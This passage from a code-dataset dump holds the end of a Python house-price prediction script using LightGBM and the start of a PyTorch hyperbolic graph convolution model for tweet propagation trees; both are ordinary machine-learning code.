         dataframe['KitchenQual'] + \\\n                             dataframe['HeatingQC']\n\n    dataframe['HasPool'] = dataframe['PoolArea'].apply(lambda x: 1 if x > 0 else 0)\n    dataframe['Has2ndFloor'] = dataframe['2ndFlrSF'].apply(lambda x: 1 if x > 0 else 0)\n    dataframe['hasgarage'] = dataframe['GarageCars'].apply(lambda x: 1 if x > 0 else 0)\n    dataframe['HasFireplace'] = dataframe['Fireplaces'].apply(lambda x: 1 if x > 0 else 0)\n    dataframe['HasPorch'] = dataframe['TotalPorchSF'].apply(lambda x: 1 if x > 0 else 0)\n    dataframe['HasBsmt'] = dataframe['TotalBsmtSF'].apply(lambda x: 1 if x > 0 else 0)\n    dataframe[\"hascentralAir\"] = dataframe[\"CentralAir\"].apply(lambda x: 1 if x > 0 else 0)\n\n    cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n\n    corr = dataframe.corr()\n    corr.sort_values([\"SalePrice\"], ascending=False, inplace=True)\n    print(corr.SalePrice[:11])\n\n    low_corrs, high_corrs = find_correlation(dataframe, num_cols)\n    high_correlated_cols(dataframe, False, 0.80)\n\n    # RARE ENCODING\n    cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n    rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n    dataframe = rare_encoder(dataframe, 0.01, cat_cols)\n    rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n    useless_cols = [col for col in cat_cols if dataframe[col].nunique() == 1 or\n                    (dataframe[col].nunique() == 2 and (dataframe[col].value_counts() / len(dataframe) <= 0.01).any(axis=None))]\n    dataframe[useless_cols].head()\n\n    cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n\n    # update cat_cols\n    cat_cols = [col for col in cat_cols if col not in useless_cols]\n\n    # drop the useless columns from the dataframe\n    for col in useless_cols:\n        dataframe.drop(col, axis=1, inplace=True)\n\n    rare_analyser(dataframe, \"SalePrice\", cat_cols)\n    #dataframe.shape\n\n    ##################\n    # Label Encoding & One-Hot Encoding\n    ##################\n    cat_cols = cat_cols + cat_but_car\n    dataframe = one_hot_encoder(dataframe, cat_cols, drop_first=True)\n    check_df(dataframe)\n    cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n    rare_analyser(dataframe, \"SalePrice\", cat_cols)\n    useless_cols_new = [col for col in cat_cols if (dataframe[col].value_counts() / len(dataframe) <= 0.01).any(axis=None)]\n\n    for col in useless_cols_new:\n        cat_summary(dataframe, col)\n\n    for col in useless_cols_new:\n        dataframe.drop(col, axis=1, inplace=True)\n\n    #dataframe.shape\n    
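The `useless_cols_new` filter above drops any dummy column in which some value accounts for 1% of rows or less. On a hypothetical toy Series the test behaves like this (illustration only):

```python
import pandas as pd

dummy = pd.Series([1] * 99 + [0] * 1)   # minority value is exactly 1% of rows
ratios = dummy.value_counts() / len(dummy)
print((ratios <= 0.01).any(axis=None))  # True -> this column would be dropped
```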
cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n return dataframe\n\n######################################################\n# Base Models\n######################################################\ndef base_models(x, y, scoring):\n print(\"Base Models...\")\n models = [('LR', LinearRegression()),\n (\"Ridge\", Ridge()),\n (\"Lasso\", Lasso()),\n (\"ElasticNet\", ElasticNet()),\n ('KNN', KNeighborsRegressor()),\n ('CART', DecisionTreeRegressor()),\n ('RF', RandomForestRegressor()),\n ('SVR', SVR()),\n ('GBM', GradientBoostingRegressor()),\n (\"XGBoost\", XGBRegressor(objective='reg:squarederror')),\n (\"LightGBM\", LGBMRegressor()),\n (\"CatBoost\", CatBoostRegressor(verbose=False))]\n\n for name, regressor in models:\n rmse = np.mean(np.sqrt(-cross_val_score(regressor, x, y, cv=5, scoring=\"neg_mean_squared_error\")))\n print(f\"RMSE: {round(rmse, 4)} ({name}) \")\n# RMSE: 0.123 (LightGBM)\n\n######################################################\n# Automated Hyperparameter Optimization\n######################################################\ndef hyperparameter_optimization(x, y, cv=10, scoring=\"neg_mean_squared_error\"):\n print(\"Hyperparameter Optimization....\")\n\n # lightgbm_params = {'boosting_type': ['gbdt', 'dart', 'goss'],\n # \"learning_rate\": [0.01, 0.03, 0.05, 0.07, 0.1, 0.2],\n # \"n_estimators\": [100, 150, 200, 300, 400, 500],\n # \"max_depth\": [3, 5, 8],\n # \"colsample_bytree\": [0.3, 0.4, 0.5, 0.7, 0.8, 1]}\n\n best_params= {'boosting_type': 'gbdt',\n 'colsample_bytree': 0.3,\n 'learning_rate': 0.03,\n 'max_depth': 3,\n 'n_estimators': 500}\n\n models = [('LightGBM', LGBMRegressor(random_state=46), best_params)]\n\n for name, regressor, params in models:\n print(f\"########## {name} ##########\")\n rmse = np.mean(np.sqrt(-cross_val_score(regressor, x, y, cv=5, scoring=scoring)))\n print(f\"RMSE BEFORE: {round(rmse, 4)} ({name}) \")\n final_model = regressor.set_params(**best_params).fit(x,y)\n results_rmse = np.mean(np.sqrt(-cross_val_score(final_model, x, y, cv=cv, scoring=scoring)))\n print(f\"RMSE AFTER: {round(results_rmse, 4)} ({name}) \")\n # 0.11413422992471374\n\n # Feature Selection\n # i = 1\n # while i < 8:\n # zero_imp_cols = feature_imp[feature_imp[\"Value\"] < i][\"Feature\"].values\n # selected_cols = [col for col in x.columns if col not in zero_imp_cols]\n # i = i + 0.1\n # final_model = lgbm_model.set_params(**lgbm_gs_best.best_params_).fit(x[selected_cols], y)\n # rmse = np.mean(\n # np.sqrt(-cross_val_score(final_model, x[selected_cols], y, cv=5, scoring=\"neg_mean_squared_error\")))\n # print(i)\n # print(len(selected_cols))\n # print(rmse)\n\n feature_imp = pd.DataFrame({'Value': final_model.feature_importances_, 'Feature': x.columns})\n zero_imp_cols = feature_imp[feature_imp[\"Value\"] < 6.2][\"Feature\"].values\n selected_cols = [col for col in x.columns if col not in zero_imp_cols]\n\n print(\"Hyperparameter Optimization with Selected Features...\")\n print(f\"########## {name} ##########\")\n rmse = np.mean(np.sqrt(-cross_val_score(regressor, x[selected_cols], y, cv=5, scoring=scoring)))\n print(f\"RMSE BEFORE: {round(rmse, 4)} ({name}) \")\n final_model = regressor.set_params(**best_params).fit(x[selected_cols],y)\n results_rmse = np.mean(np.sqrt(-cross_val_score(final_model, x[selected_cols], y, cv=cv, scoring=scoring)))\n print(f\"RMSE AFTER: {round(results_rmse, 4)} ({name}) \")\n # 0.11297465470162453\n\n return final_model, 
selected_cols\n\n\n#######################################\n# Submitting the Results\n#######################################\ndef Predict(final_model, selected_cols, test_df):\n    print(\"Predict...\")\n    submission_df = pd.DataFrame()\n    submission_df['Id'] = test_df[\"Id\"] # the Ids provided by Kaggle\n    y_pred_sub = final_model.predict(test_df[selected_cols])\n    # the predictions are on the log scale; converting back gives the actual sale prices.\n    y_pred_sub = np.expm1(y_pred_sub) # undo the log1p applied to the target.\n    submission_df['SalePrice'] = y_pred_sub\n    return submission_df\n\n######################################################\n# Main\n######################################################\n\ndef main(base, dump, scoring):\n\n    with timer(\"Data Preprocessing\"):\n        train = pd.read_csv(\"../house_prices/train.csv\")\n        test = pd.read_csv(\"../house_prices/test.csv\")\n        df = train.append(test).reset_index(drop=True)\n        df_ = house_price_prep(dataframe=df)\n\n        test_df = df_[df_['SalePrice'].isnull()].drop(\"SalePrice\", axis=1)\n        train_df = df_[df_['SalePrice'].notnull()]\n\n        y = np.log1p(train_df['SalePrice'])\n        x = train_df.drop([\"Id\", \"SalePrice\"], axis=1)\n\n    if base:\n        with timer(\"Base Models\"):\n            base_models(x, y, scoring)\n\n    with timer(\"Hyperparameter Optimization\"):\n        final_model, selected_cols = hyperparameter_optimization(x, y, cv=10, scoring=scoring)\n\n    with timer(\"Predict\"):\n\n        submission_df = Predict(final_model, selected_cols, test_df)\n        if dump:\n            print(\"Predict Model Saved\")\n            submission_df.to_csv('submission.csv', index=False)\n            joblib.dump(submission_df, \"predict_clf.pkl\")\n\n\nif __name__ == \"__main__\":\n\n    namespace = get_namespace()\n\n    with timer(\"Full Script Running Time\"):\n        main(base=namespace.base, dump=namespace.dump, scoring=namespace.scoring)\n\n\n","repo_name":"rabia-koc/AUTOMATED_HOUSE_PRICE_PREDICTION_ML","sub_path":"AUTOMATED_HOUSE_PRICE_PREDICTION_ML.py","file_name":"AUTOMATED_HOUSE_PRICE_PREDICTION_ML.py","file_ext":"py","file_size_in_byte":29619,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"}{"seq_id":"37526727463","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 2 18:00:44 2021\n\n@author: huymai\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport json\nimport math\nimport copy\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset\nfrom torch_geometric.data import Data\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch_geometric.data import DataLoader\nfrom torch.nn import Parameter\nimport torch.nn.init as init\nfrom torch.nn.modules.module import Module \nimport torch_geometric\n\nfrom torch.utils import mkldnn as mkldnn_utils\nfrom torch_scatter import scatter_mean, scatter_max\n\nfrom sklearn.metrics import f1_score\n\nfrom torch_geometric.nn import MessagePassing\nfrom torch_geometric.utils import add_self_loops, degree\n\n# treeGraph stuff\nclass Node_tweet(object):\n    def __init__(self, idx=None):\n        self.children = []\n        self.idx = idx\n        self.feature = []\n        self.parent = None\n        \ndef construct_tree(graph):\n    index2node = {}\n    for i in graph:\n        node = Node_tweet(idx=i)\n        index2node[i] = node\n    for j in graph:\n        indexC = j\n        indexP = graph[j]['parent']\n        nodeC = index2node[indexC]\n        nodeC.feature = graph[j]['vec']\n        if not indexP == 'None':\n            nodeP = index2node[int(indexP)]\n            nodeC.parent = nodeP\n            nodeP.children.append(nodeC)\n        else:\n            root = nodeC\n            rootindex = indexC\n            
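`construct_tree` turns the per-tweet parent pointers into node objects, an adjacency matrix, and a two-row edge list. A minimal standalone sketch of the same parent-dict-to-edge-list conversion, on a hypothetical toy graph (edges are added in both directions, as in the loop below):

```python
import numpy as np

def parent_dict_to_edges(graph):
    rows, cols = [], []
    for child, info in graph.items():
        if info["parent"] != "None":
            parent = int(info["parent"])
            rows.extend([parent, child])
            cols.extend([child, parent])
    return np.array([rows, cols])

toy = {0: {"parent": "None"}, 1: {"parent": "0"}, 2: {"parent": "0"}}
print(parent_dict_to_edges(toy))  # rows: [0 1 0 2], cols: [1 0 2 0]
```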
root_feature = graph[rootindex]['vec']\n \n # convert graph to adjacency matrix and edge matrix\n adj_matrix = np.zeros([len(index2node), len(index2node)])\n row = []\n col = []\n x_x = []\n edge_matrix = []\n for index_i in range(len(index2node)):\n for index_j in range(len(index2node)):\n if index2node[index_i].children != None and index2node[index_j] in index2node[index_i].children:\n adj_matrix[index_i][index_j] = 1\n adj_matrix[index_j][index_i] = 1\n row.extend([index_i, index_j])\n col.extend([index_j, index_i])\n x_x.append(index2node[index_i].feature)\n edge_matrix.append(row)\n edge_matrix.append(col)\n \n return x_x, adj_matrix, root_feature, rootindex, edge_matrix, index2node\n\n# Graph Dataset\nclass GraphDataset(Dataset):\n def __init__(self, list_of_features, edge_indices, labels):\n self.list_of_features = list_of_features\n self.edge_indices = edge_indices\n self.labels = labels\n\n def __len__(self):\n return len(self.edge_indices)\n\n def __getitem__(self, index):\n # get edge_index\n edge_index = np.array(self.edge_indices[index])\n \n # get features (x)\n features = self.list_of_features[index]\n \n # get label (y)\n label = self.labels[index]\n \n return Data(x = torch.tensor(features), edge_index = torch.LongTensor(edge_index), y = torch.tensor(label))\n\n# Hyperbolic math\ndef cosh(x, clamp=15):\n return x.clamp(-clamp, clamp).cosh()\n\n\ndef sinh(x, clamp=15):\n return x.clamp(-clamp, clamp).sinh()\n\n\ndef tanh(x, clamp=15):\n return x.clamp(-clamp, clamp).tanh()\n\n\ndef arcosh(x):\n return Arcosh.apply(x)\n\n\ndef arsinh(x):\n return Arsinh.apply(x)\n\n\ndef artanh(x):\n return Artanh.apply(x)\n\n\nclass Artanh(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x):\n x = x.clamp(-1 + 1e-15, 1 - 1e-15)\n ctx.save_for_backward(x)\n z = x.double()\n return (torch.log_(1 + z).sub_(torch.log_(1 - z))).mul_(0.5).to(x.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n input, = ctx.saved_tensors\n return grad_output / (1 - input ** 2)\n\n\nclass Arsinh(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x):\n ctx.save_for_backward(x)\n z = x.double()\n return (z + torch.sqrt_(1 + z.pow(2))).clamp_min_(1e-15).log_().to(x.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n input, = ctx.saved_tensors\n return grad_output / (1 + input ** 2) ** 0.5\n\n\nclass Arcosh(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x):\n x = x.clamp(min=1.0 + 1e-15)\n ctx.save_for_backward(x)\n z = x.double()\n return (z + torch.sqrt_(z.pow(2) - 1)).clamp_min_(1e-15).log_().to(x.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n input, = ctx.saved_tensors\n return grad_output / (input ** 2 - 1) ** 0.5\n \n# DenseAtt\nclass DenseAtt(nn.Module):\n def __init__(self, in_features, dropout):\n super(DenseAtt, self).__init__()\n self.dropout = dropout\n self.linear = nn.Linear(2 * in_features, 1, bias=True)\n self.in_features = in_features\n\n def forward (self, x, adj):\n n = x.size(0)\n # n x 1 x d\n x_left = torch.unsqueeze(x, 1)\n x_left = x_left.expand(-1, n, -1)\n # 1 x n x d\n x_right = torch.unsqueeze(x, 0)\n x_right = x_right.expand(n, -1, -1)\n\n x_cat = torch.cat((x_left, x_right), dim=2)\n att_adj = self.linear(x_cat).squeeze()\n att_adj = F.sigmoid(att_adj)\n att_adj = torch.mul(adj.to('cpu'), att_adj)\n return att_adj\n \n# Manifold\nclass Manifold(object):\n \"\"\"\n Abstract class to define operations on a manifold.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.eps = 10e-8\n\n def sqdist(self, p1, p2, c):\n 
\"\"\"Squared distance between pairs of points.\"\"\"\n raise NotImplementedError\n\n def egrad2rgrad(self, p, dp, c):\n \"\"\"Converts Euclidean Gradient to Riemannian Gradients.\"\"\"\n raise NotImplementedError\n\n def proj(self, p, c):\n \"\"\"Projects point p on the manifold.\"\"\"\n raise NotImplementedError\n\n def proj_tan(self, u, p, c):\n \"\"\"Projects u on the tangent space of p.\"\"\"\n raise NotImplementedError\n\n def proj_tan0(self, u, c):\n \"\"\"Projects u on the tangent space of the origin.\"\"\"\n raise NotImplementedError\n\n def expmap(self, u, p, c):\n \"\"\"Exponential map of u at point p.\"\"\"\n raise NotImplementedError\n\n def logmap(self, p1, p2, c):\n \"\"\"Logarithmic map of point p1 at point p2.\"\"\"\n raise NotImplementedError\n\n def expmap0(self, u, c):\n \"\"\"Exponential map of u at the origin.\"\"\"\n raise NotImplementedError\n\n def logmap0(self, p, c):\n \"\"\"Logarithmic map of point p at the origin.\"\"\"\n raise NotImplementedError\n\n def mobius_add(self, x, y, c, dim=-1):\n \"\"\"Adds points x and y.\"\"\"\n raise NotImplementedError\n\n def mobius_matvec(self, m, x, c):\n \"\"\"Performs hyperboic martrix-vector multiplication.\"\"\"\n raise NotImplementedError\n\n def init_weights(self, w, c, irange=1e-5):\n \"\"\"Initializes random weigths on the manifold.\"\"\"\n raise NotImplementedError\n\n def inner(self, p, c, u, v=None, keepdim=False):\n \"\"\"Inner product for tangent vectors at point x.\"\"\"\n raise NotImplementedError\n\n def ptransp(self, x, y, u, c):\n \"\"\"Parallel transport of u from x to y.\"\"\"\n raise NotImplementedError\n\n def ptransp0(self, x, u, c):\n \"\"\"Parallel transport of u from the origin to y.\"\"\"\n raise NotImplementedError\n\n\nclass ManifoldParameter(Parameter):\n \"\"\"\n Subclass of torch.nn.Parameter for Riemannian optimization.\n \"\"\"\n def __new__(cls, data, requires_grad, manifold, c):\n return Parameter.__new__(cls, data, requires_grad)\n\n def __init__(self, data, requires_grad, manifold, c):\n self.c = c\n self.manifold = manifold\n\n def __repr__(self):\n return '{} Parameter containing:\\n'.format(self.manifold.name) + super(Parameter, self).__repr__()\n \nclass Hyperboloid(Manifold):\n \"\"\"\n Hyperboloid manifold class.\n We use the following convention: -x0^2 + x1^2 + ... + xd^2 = -K\n c = 1 / K is the hyperbolic curvature. \n \"\"\"\n\n def __init__(self):\n super(Hyperboloid, self).__init__()\n self.name = 'Hyperboloid'\n self.eps = {torch.float32: 1e-7, torch.float64: 1e-15}\n self.min_norm = 1e-15\n self.max_norm = 1e6\n\n def minkowski_dot(self, x, y, keepdim=True):\n res = torch.sum(x * y, dim=-1) - 2 * x[..., 0] * y[..., 0]\n if keepdim:\n res = res.view(res.shape + (1,))\n return res\n\n def minkowski_norm(self, u, keepdim=True):\n dot = self.minkowski_dot(u, u, keepdim=keepdim)\n return torch.sqrt(torch.clamp(dot, min=self.eps[u.dtype]))\n\n def sqdist(self, x, y, c):\n K = 1. / c\n prod = self.minkowski_dot(x, y)\n theta = torch.clamp(-prod / K, min=1.0 + self.eps[x.dtype])\n sqdist = K * arcosh(theta) ** 2\n # clamp distance to avoid nans in Fermi-Dirac decoder\n return torch.clamp(sqdist, max=50.0)\n\n def proj(self, x, c):\n K = 1. 
/ c\n d = x.size(-1) - 1\n y = x.narrow(-1, 1, d)\n y_sqnorm = torch.norm(y.float(), p=2, dim=1, keepdim=True) ** 2 \n mask = torch.ones_like(x)\n mask[:, 0] = 0\n vals = torch.zeros_like(x)\n x = x.float()\n # print(x.dtype)\n vals[:, 0:1] = torch.sqrt(torch.clamp(K + y_sqnorm, min=self.eps[x.dtype]))\n return vals + mask * x\n\n def proj_tan(self, u, x, c):\n hidden_dim = 32\n if x.shape[0] == hidden_dim and len(x.shape) == 1:\n # print(x.shape)\n x = torch.reshape(x, (1, hidden_dim))\n K = 1. / c\n d = x.size(-1) - 1\n ux = torch.sum(x.narrow(-1, 1, d) * u.narrow(-1, 1, d), dim=1, keepdim=True)\n mask = torch.ones_like(u)\n mask[:, 0] = 0\n vals = torch.zeros_like(u)\n # print(vals.shape)\n # print(\"====\")\n # print(x.shape)\n vals[:, 0:1] = ux / torch.clamp(x[:, 0:1], min=self.eps[x.dtype])\n return vals + mask * u\n\n def proj_tan0(self, u, c):\n narrowed = u.narrow(-1, 0, 1)\n vals = torch.zeros_like(u)\n vals[:, 0:1] = narrowed\n return u - vals\n\n def expmap(self, u, x, c):\n K = 1. / c\n sqrtK = K ** 0.5\n normu = self.minkowski_norm(u)\n normu = torch.clamp(normu, max=self.max_norm)\n theta = normu / sqrtK\n theta = torch.clamp(theta, min=self.min_norm)\n result = cosh(theta) * x + sinh(theta) * u / theta\n return self.proj(result, c)\n \n def logmap(self, x, y, c):\n K = 1. / c\n xy = torch.clamp(self.minkowski_dot(x, y) + K, max=-self.eps[x.dtype]) - K\n u = y + xy * x * c\n normu = self.minkowski_norm(u)\n normu = torch.clamp(normu, min=self.min_norm)\n dist = self.sqdist(x, y, c) ** 0.5\n result = dist * u / normu\n return self.proj_tan(result, x, c)\n\n def expmap0(self, u, c):\n K = 1. / c\n sqrtK = K ** 0.5\n d = u.size(-1) - 1\n x = u.narrow(-1, 1, d).view(-1, d)\n x_norm = torch.norm(x.float(), p=2, dim=1, keepdim=True)\n x_norm = torch.clamp(x_norm, min=self.min_norm)\n theta = x_norm / sqrtK\n res = torch.ones_like(u)\n res[:, 0:1] = sqrtK * cosh(theta)\n res[:, 1:] = sqrtK * sinh(theta) * x / x_norm\n return self.proj(res, c)\n\n def logmap0(self, x, c):\n K = 1. / c\n sqrtK = K ** 0.5\n d = x.size(-1) - 1\n y = x.narrow(-1, 1, d).view(-1, d)\n y_norm = torch.norm(y, p=2, dim=1, keepdim=True)\n y_norm = torch.clamp(y_norm, min=self.min_norm)\n res = torch.zeros_like(x)\n theta = torch.clamp(x[:, 0:1] / sqrtK, min=1.0 + self.eps[x.dtype])\n res[:, 1:] = sqrtK * arcosh(theta) * y / y_norm\n return res\n\n def mobius_add(self, x, y, c):\n u = self.logmap0(y, c)\n v = self.ptransp0(x, u, c)\n return self.expmap(v, x, c)\n\n def mobius_matvec(self, m, x, c):\n u = self.logmap0(x, c).float()\n mu = u @ m.transpose(-1, -2)\n return self.expmap0(mu, c)\n\n def ptransp(self, x, y, u, c):\n logxy = self.logmap(x, y, c)\n logyx = self.logmap(y, x, c)\n sqdist = torch.clamp(self.sqdist(x, y, c), min=self.min_norm)\n alpha = self.minkowski_dot(logxy, u) / sqdist\n res = u - alpha * (logxy + logyx)\n return self.proj_tan(res, y, c)\n\n def ptransp0(self, x, u, c):\n K = 1. / c\n sqrtK = K ** 0.5\n x0 = x.narrow(-1, 0, 1)\n d = x.size(-1) - 1\n y = x.narrow(-1, 1, d)\n y_norm = torch.clamp(torch.norm(y, p=2, dim=1, keepdim=True), min=self.min_norm)\n y_normalized = y / y_norm\n v = torch.ones_like(x)\n v[:, 0:1] = - y_norm \n v[:, 1:] = (sqrtK - x0) * y_normalized\n alpha = torch.sum(y_normalized * u[:, 1:], dim=1, keepdim=True) / sqrtK\n res = u - alpha * v\n return self.proj_tan(res, x, c)\n\n def to_poincare(self, x, c):\n K = 1. 
/ c\n sqrtK = K ** 0.5\n d = x.size(-1) - 1\n return sqrtK * x.narrow(-1, 1, d) / (x[:, 0:1] + sqrtK)\n \n# Hyperbolic layers\ndef get_dim_act_curv(c, act, num_layers, feat_dim, dim):\n \"\"\"\n Helper function to get dimension and activation at every layer.\n :param args:\n :return:\n \"\"\"\n acts = [act] * (num_layers - 1)\n dims = [feat_dim] + ([dim] * (num_layers - 1))\n n_curvatures = num_layers - 1\n \n # fixed curvature\n curvatures = [torch.tensor([c]) for _ in range(n_curvatures)]\n curvatures = [curv.to(device) for curv in curvatures]\n \n return dims, acts, curvatures\n\nclass HyperbolicGraphConvolution(nn.Module):\n \"\"\"\n Hyperbolic graph convolution layer.\n \"\"\"\n\n def __init__(self, manifold, in_features, out_features, c_in, c_out, dropout, act, use_bias, use_att, local_agg):\n super(HyperbolicGraphConvolution, self).__init__()\n self.linear = HypLinear(manifold, in_features, out_features, c_in, dropout, use_bias)\n self.agg = HypAgg(manifold, c_in, out_features, dropout, use_att, local_agg)\n self.hyp_act = HypAct(manifold, c_in, c_out, act)\n\n def forward(self, input):\n x, adj = input\n h = self.linear(x)\n h = self.agg(h, adj)\n h = self.hyp_act(h)\n output = h, adj\n return output\n\n\nclass HypLinear(nn.Module):\n \"\"\"\n Hyperbolic linear layer.\n \"\"\"\n\n def __init__(self, manifold, in_features, out_features, c, dropout, use_bias):\n super(HypLinear, self).__init__()\n self.manifold = manifold\n self.in_features = in_features\n self.out_features = out_features\n self.c = c\n self.dropout = dropout\n self.use_bias = use_bias\n self.bias = nn.Parameter(torch.Tensor(out_features))\n self.weight = nn.Parameter(torch.Tensor(out_features, in_features))\n self.reset_parameters()\n\n def reset_parameters(self):\n init.uniform_(self.weight)\n init.constant_(self.bias, 0)\n\n def forward(self, x):\n drop_weight = F.dropout(self.weight, self.dropout, training=self.training)\n mv = self.manifold.mobius_matvec(drop_weight, x, self.c) # manifold\n res = self.manifold.proj(mv, self.c)\n if self.use_bias:\n bias = self.manifold.proj_tan0(self.bias.view(1, -1), self.c)\n hyp_bias = self.manifold.expmap0(bias, self.c)\n hyp_bias = self.manifold.proj(hyp_bias, self.c)\n res = self.manifold.mobius_add(res, hyp_bias, c=self.c)\n res = self.manifold.proj(res, self.c)\n return res\n\n def extra_repr(self):\n return 'in_features={}, out_features={}, c={}'.format(\n self.in_features, self.out_features, self.c\n )\n\n\nclass HypAgg(Module):\n \"\"\"\n Hyperbolic aggregation layer.\n \"\"\"\n\n def __init__(self, manifold, c, in_features, dropout, use_att, local_agg):\n super(HypAgg, self).__init__()\n self.manifold = manifold\n self.c = c\n\n self.in_features = in_features\n self.dropout = dropout\n self.local_agg = local_agg\n self.use_att = use_att\n if self.use_att:\n self.att = DenseAtt(in_features, dropout) # DenseAtt\n\n def forward(self, x, adj):\n x_tangent = self.manifold.logmap0(x, c=self.c)\n if self.use_att:\n if self.local_agg:\n x_local_tangent = []\n for i in range(x.size(0)):\n x_local_tangent.append(self.manifold.logmap(x[i], x, c=self.c))\n x_local_tangent = torch.stack(x_local_tangent, dim=0)\n adj_att = self.att(x_tangent, adj)\n att_rep = adj_att.unsqueeze(-1) * x_local_tangent\n support_t = torch.sum(adj_att.unsqueeze(-1) * x_local_tangent, dim=1)\n output = self.manifold.proj(self.manifold.expmap(x, support_t, c=self.c), c=self.c)\n return output\n else:\n adj_att = self.att(x_tangent, adj)\n support_t = torch.matmul(adj_att.to('cpu'), x_tangent.to('cpu'))\n 
else:\n support_t = torch.spmm(adj.to('cpu'), x_tangent.to('cpu')).to('cpu')\n output = self.manifold.proj(self.manifold.expmap0(support_t, c=self.c), c=self.c)\n return output\n\n def extra_repr(self):\n return 'c={}'.format(self.c)\n\n\nclass HypAct(Module):\n \"\"\"\n Hyperbolic activation layer.\n \"\"\"\n\n def __init__(self, manifold, c_in, c_out, act):\n super(HypAct, self).__init__()\n self.manifold = manifold\n self.c_in = c_in\n self.c_out = c_out\n self.act = nn.LeakyReLU()\n\n def forward(self, x):\n xt = self.act(self.manifold.logmap0(x, c=self.c_in))\n xt = torch.tensor(xt)\n xt = self.manifold.proj_tan0(xt, c=self.c_out)\n return self.manifold.proj(self.manifold.expmap0(xt, c=self.c_out), c=self.c_out)\n\n def extra_repr(self):\n return 'c_in={}, c_out={}'.format(\n self.c_in, self.c_out\n )\n \n# Encoders\nclass Encoder(nn.Module):\n \"\"\"\n Encoder abstract class.\n \"\"\"\n\n def __init__(self, c):\n super(Encoder, self).__init__()\n self.c = c\n\n def encode(self, x, adj):\n if self.encode_graph:\n input = (x, adj)\n output, _ = self.layers(input)\n else:\n output = self.layers(x)\n return output\n \nclass HGCN(Encoder):\n \"\"\"\n Hyperbolic-GCN.\n \"\"\"\n\n def __init__(self, c, dropout, bias, use_att, local_agg):\n super(HGCN, self).__init__(c)\n dims, acts, self.curvatures = get_dim_act_curv(c=c, act='relu', num_layers=2, feat_dim=128, dim=32 )\n self.manifold = Hyperboloid()\n self.curvatures.append(self.c)\n hgc_layers = []\n for i in range(len(dims) - 1):\n c_in, c_out = self.curvatures[i], self.curvatures[i + 1]\n in_dim, out_dim = dims[i], dims[i + 1]\n act = acts[i]\n hgc_layers.append(\n HyperbolicGraphConvolution(\n self.manifold, in_dim, out_dim, c_in, c_out, dropout, act, bias, use_att, local_agg\n )\n )\n self.layers = nn.Sequential(*hgc_layers)\n self.encode_graph = True\n\n def encode(self, x, adj):\n x_tan = self.manifold.proj_tan0(x, self.curvatures[0]) # manifold\n x_hyp = self.manifold.expmap0(x_tan, c=self.curvatures[0])\n x_hyp = self.manifold.proj(x_hyp, c=self.curvatures[0])\n return super().encode(x_hyp, adj)\n\ndef init_weights(m):\n if type(m) == nn.Linear:\n torch.nn.init.xavier_uniform(m.weight)\n m.bias.data.fill_(0.01)\n\n# Base Model\nclass BaseModel(nn.Module):\n \"\"\"\n Base model for graph embedding tasks.\n \"\"\"\n\n def __init__(self, device, c):\n super(BaseModel, self).__init__()\n \n # c is the hyperbolic curvature\n self.c = torch.tensor([c]).to(device)\n \n self.encoder = HGCN(c=self.c, dropout=0.5, bias=1, use_att=True, local_agg=False)\n \n \n self.output = nn.Sequential(\n nn.Linear(32, 1),\n nn.Sigmoid()\n )\n \n \n\n def forward(self, x, edge_m, batch):\n o = torch.zeros_like(x)\n\n # derive adj_matrix from edge_m\n edge_m_transposed = torch.transpose(edge_m, 0, 1)\n adj = torch.zeros_like(torch.empty(len(x), len(x)))\n for item in edge_m_transposed:\n adj[item[0]][item[1]] = 1\n \n h = self.encoder.encode(x, adj)\n # take care of the row of nans\n h[torch.isnan(h)] = 0\n # print(h)\n \n # h = F.normalize(h, dim=0)\n \n # mean pooling\n h = scatter_max(h, batch.batch.to('cpu'), dim=0)\n # print(h)\n # h = torch_geometric.nn.pool.avg_pool_x(torch.zeros(h.shape[0]).to('cuda'), h, torch.zeros(h.shape[0]).to('cuda'))\n \n # normalize output of mean pooling\n h = F.normalize(h[0], dim=0)\n # print(h)\n out = self.output(h)\n return out\n\n# Base Model 2\n\nclass GCNConv(MessagePassing):\n def __init__(self, in_channels, out_channels):\n super(GCNConv, self).__init__(aggr='add') # \"Add\" aggregation (Step 5).\n self.lin = 
torch.nn.Linear(in_channels, out_channels)\n\n def forward(self, x, edge_index):\n # x has shape [N, in_channels]\n # edge_index has shape [2, E]\n\n # Step 1: Add self-loops to the adjacency matrix.\n edge_index, _ = add_self_loops(edge_index, num_nodes=x.size(0))\n\n # Step 2: Linearly transform node feature matrix.\n x = self.lin(x)\n\n # Step 3: Compute normalization.\n row, col = edge_index\n deg = degree(col, x.size(0), dtype=x.dtype)\n deg_inv_sqrt = deg.pow(-0.5)\n deg_inv_sqrt[deg_inv_sqrt == float('inf')] = 0\n norm = deg_inv_sqrt[row] * deg_inv_sqrt[col]\n\n # Step 4-5: Start propagating messages.\n return self.propagate(edge_index, x=x, norm=norm)\n\n def message(self, x_j, norm):\n # x_j has shape [E, out_channels]\n\n # Step 4: Normalize node features.\n return norm.view(-1, 1) * x_j\n \nclass BaseModelH(nn.Module):\n def __init__(self, in_feats, hid_feats, out_feats):\n super(BaseModelH, self).__init__()\n self.gcn1 = GCNConv(in_feats, hid_feats)\n self.gcn2 = GCNConv(hid_feats, out_feats)\n \n def forward(self, data):\n x1 = self.gcn1(data['x'].float(), data['edge_index'].float())\n x2 = self.gcn2(x1, data['edge_index'].float())\n return x2\n \ndef update_function(param, grad, loss, learning_rate):\n return param - learning_rate * 